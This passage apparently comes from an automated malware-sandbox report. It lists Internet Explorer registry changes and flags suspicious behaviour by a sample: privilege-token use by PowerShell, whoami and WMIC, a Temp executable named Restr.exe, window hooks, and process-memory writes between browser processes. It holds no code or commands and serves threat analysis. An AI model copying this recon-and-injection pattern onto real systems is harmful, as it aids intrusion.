01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000e326887780a1cc42463cf93e23f06042acd5c980d89817792e775c618e0d43b8000000000e800000000200002000000055abac4686cabcc75247a81859be176f7a560c2c5bfd9dda27ff2afd67379033c00000002ff4356701135e094e80d75fdaecb8ab772ee676e5e01642c2a33e9bbf7e50375c8ee026ab0ccedb8787c7227d038aa46a402eca5c23325f7a4a451fdf6550daef8010e84deb2c9233436cb973eef1bf3aee4f921b581c1a1a27ad861e06fe37e191674716cb4ba64c2b6cbb6a4ca3d6e00a03571ff046a6fb7ca87f8b162b50f986670d5dd33eabbebccd8d2078011006a75e6db928b405f228ed9e790a55394f4503bb8024ecc4a3c69714d843817dd540a43745fb7767daf7ee1ddc22443840000000d014b15674dd9636b3652290fec5ed434ee14b05cd1fd10a50f2a0a2459d7129398ae538fb5ae639fd49cf02f80b36dd2733af24d7c80a0f0f37a0be1badc496 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30947395" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a000000000200000000001066000000010000200000003b5e9f8a3527493be13b41a2ebf9589c6a62d994d237ab9a902929e775e008db000000000e8000000002000020000000cc4c139c1f3d8410a3fd4853043fbe56b3d607b907b48298c54eacf00a9abd47c000000089e50698452806b0aee4c5b9089a35317661a825ac7b9d014527f1bcea9113a7ef7c06ac14da56fbee2af2dffcd63be96c075c9d8669adb3ee1122baf68e8e3a142f0ecb52f0046426d9aebb71f83e81d052bdb33f00fe5e454da98ca70b35a105afbaeb1f1aac26a1b3cbfd5552ec2bb815cba9fce85e4e284027fb3a5c50ec101b8f150dec2c9304f7ba46fe8660bb4c822f437fb42b08d6d262fed0f90354504905d57ed89a0a20333c547e510e2f60d76f146a03e117168ef32b23af7a4f40000000015aa826f466813f1d71d4311b3427b7a381f759fb95d11b8a0305c39a3d97ff37ea1b218cb305c18ac1d2bc089c6aa515ec559afab86ac24cd68446d0989b39 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{B5C4DBF1-A436-11EC-B9A4-4AFEF23D9694} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a000000000200000000001066000000010000200000002b81c0d1b0f11c7d4a69ac85f855dd5d3531371c745e79c1748263e9f65aafd7000000000e8000000002000020000000dec3bf4126fc2cec7658286bf2e75aea9cd303e274940af838a83d99b480d4a4c00000006a2273a44b604d49362481938faa54560d195fa9f572a0a70def88063b2e9ad78e8e23cea03120b97dc5495883d4a4d685fd288eb16ce0ebc9f0efaa8c6b0980c3286da79ce6fe3a2785adb3234965c736173a61fdf2ef35ec210c1a0a7ff3079f02b801b4f94159e3f1413998d7afbe4a6700c1257ec98e75f4a984f059e5e25d2f7c4c0bd78d47ec8f2a5a63f5c24a6ed338bad5258a4a45e294fb404b8319db27e63f91e15f40a8e0c863ff3e38fda6f967df22b01efdba3f2d90cc58b390400000008eab2544967c183af1aa951bde7de48503e099d1f9f342e1cc63bdf17b379cc3fbf7a265e549ff3d69a16a024e76b5ff318f32fd03c6ad372e8d81b1f79e8fe6 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a000000000200000000001066000000010000200000008b909b8338d4738f4b3b2e4dcbe9cf0e2b037d12806396cf22528efc111641bb000000000e8000000002000020000000366574914b9a1bd144898af76963d69ad400b90ba988cc139251325775b3fe2d200000001129b6fe636ba60b01daa27e12b9ab8fdc1487eff7892c55d8b815f2cb97ee5440000000f7cdcb0ff5fdc78d44c377472c443e9f35b6f7984431996e83c3ea46c09db82d47785179d8f732a0b5ffafb83318a2edcf3f22a3964433b7815b60c96d4348bb C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000a66e371bb720c51e3ce959f7d76bb8c3cdb54906ddbacd6d16db9979ca8ee8fa000000000e800000000200002000000004b2a81af273a64ddc93af4aaa6f1741e55ca8e7ecb1b47489aad81f732e0205c0000000c1f9028bd43c6aab06677e5630a882416d5ecf594f78ce11bb4c7923d0cc945b015466f8e51f0eebadb06f225dd20801fb75bc06aada4047ce0c0b6b94a26fe7b7521eb0939e853f0e4c4534a8330afa77b05b9c674f7ae16c976509c0a5f253be1f71376005c18e943fe2cdf0449867f0de57d66c9983a2dbac1641bb19d0f6ff8b83536d8555b7f15507f68f55b707ea684b69deba8d1e18914d13d00d54f582e00c836065ad39d3093e75418b58bf996b600f7f54f9c94acf72a991a1f90f400000000e708e0f62d9f0fe62c53eb447fa000d062a052fcaf6e7dc4811e627bbc9696165c7c7723fca50b823d0c92ed7dda40a63d46d1f2565fe9605bc7f37542b1b31 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30947395" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a000000000200000000001066000000010000200000001f0aae9c0cd96dd491fc79ea15f0f6b636f967a6f3e23a18a441c4f3b0700d29000000000e800000000200002000000030a6ccf90c261a9482e7b4eedd1a54fa7bf5c252b59730b66240bf4ca554439ac00000009b6104ba8a136c318627f726fe926fa27afe30b366686bafc68e78b1b2a2132075e1d95790f16752f40207991ff7660d0694967f433347839165e8ab49734d841ff3735b4f36f968769a95996862c954c0302d109461a8b60a7703e5ef06ff67fa7dfec1876f9f9de6bd4d6c64cd3a462e6ac9acd58bfa6df8ab3f4a7e30be5b18ba8b378c44ed254394a86d22964cd4f297d4f296594c1fd3d0ad752e1f75be53ad75961b05f64646fdd98dd383bb4c6ebeb952130f00349d0cdfa782e2a2de400000003b47780404277f566799d740c110b41ce78ba25f81f641c2525b308b772869bc5c9ea86d3b67489239ed8827e40e915281086f4450d75b62ba9ec69759879750 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000dab01f0f7faab4215f0fcb8b440aa7fe3462ab84531a7e991078e12322072e96000000000e800000000200002000000066f74c5f8304307b95bcb2799d4aa71384ea31b06948dda581989f0f3f73620fc0000000212ed449ae5d1b9a6ec1de03d13106297abfea4735369036b56e487aa036316c1256bc6d0b418a08b0e4c60b09c498a9d59160251f7a8e455bfde4c620e2fe70b2f144789ea683cfa5ed534706285fb43bec4e243c3e7dcfb1f6e3e1b54293543b34ff6a82ca84e9e4f66d4ccd7b72dfa50275a4d176e4c39382dca21eece1f0731a213e19312d6182ecf8c85ea6e26075cb1267dbb6ae952633120216c79f3fff6a627f5f9cb1ed801920a346f87adf7cd20f1f54f5254d9930b71c902d4086400000007ed9abcba78840c86d9f40c12c1be9a627f825e5fbbd6fb78fea9301c6e0bd1928dffe8f87d3565e508b3acf3294883c92f00226b0cfce0b58fda69926825808 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff1a0000001a000000a00400007f020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000411587c25fe2549f47ac2ac20e6f02c2d12e2e48d4f22792472c74a43ec7d78b000000000e800000000200002000000088cb7284ad731794a44ee084fa73c72f4c7338652efa5b2eec4666fe23b1e1f0c00000009d93904ecaaad13abbf02c36ccad44b328e7b4c97957f2f7bbbbb8c6b6f368729bfbd3117aaf84d358ec421d1f313dd91780fa5dfefa28260e87f5f401955b0ab2ea80fbe028949043da6502a0f9ac30025034237511fdbd5a90a1a7bd8474eaca17673282739409211b3f61438b5403670e140d21be409f7fd95225268f0dc265aeda3c5bc9fb42570bde13b56213494b074f84e5793637cf82e13983e6ab832cd13d67094430c3c50b623e208c5b3b4d1a46cd39c4e130d78c3e63ca8c3e3e40000000a6f09b7d58a33e4e1cf57008065497942cbe53dbe2316009d86aa8245f160d2594e8c44028950d7ad387b82a8e5ad8eb8e81c243c22c0d5610f3cceb64e544eb C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2317671783" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80997d7c4338d801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Runs net.exe

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2420 wrote to memory of 2728 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2728 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2728 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 1748 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 1748 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 1748 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4592 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4592 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4592 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 3596 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 3596 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 3596 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2180 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2180 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2180 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4732 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4732 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4732 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 1564 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 1564 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 1564 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2320 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2320 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 2320 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4184 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4184 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2420 wrote to memory of 4184 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
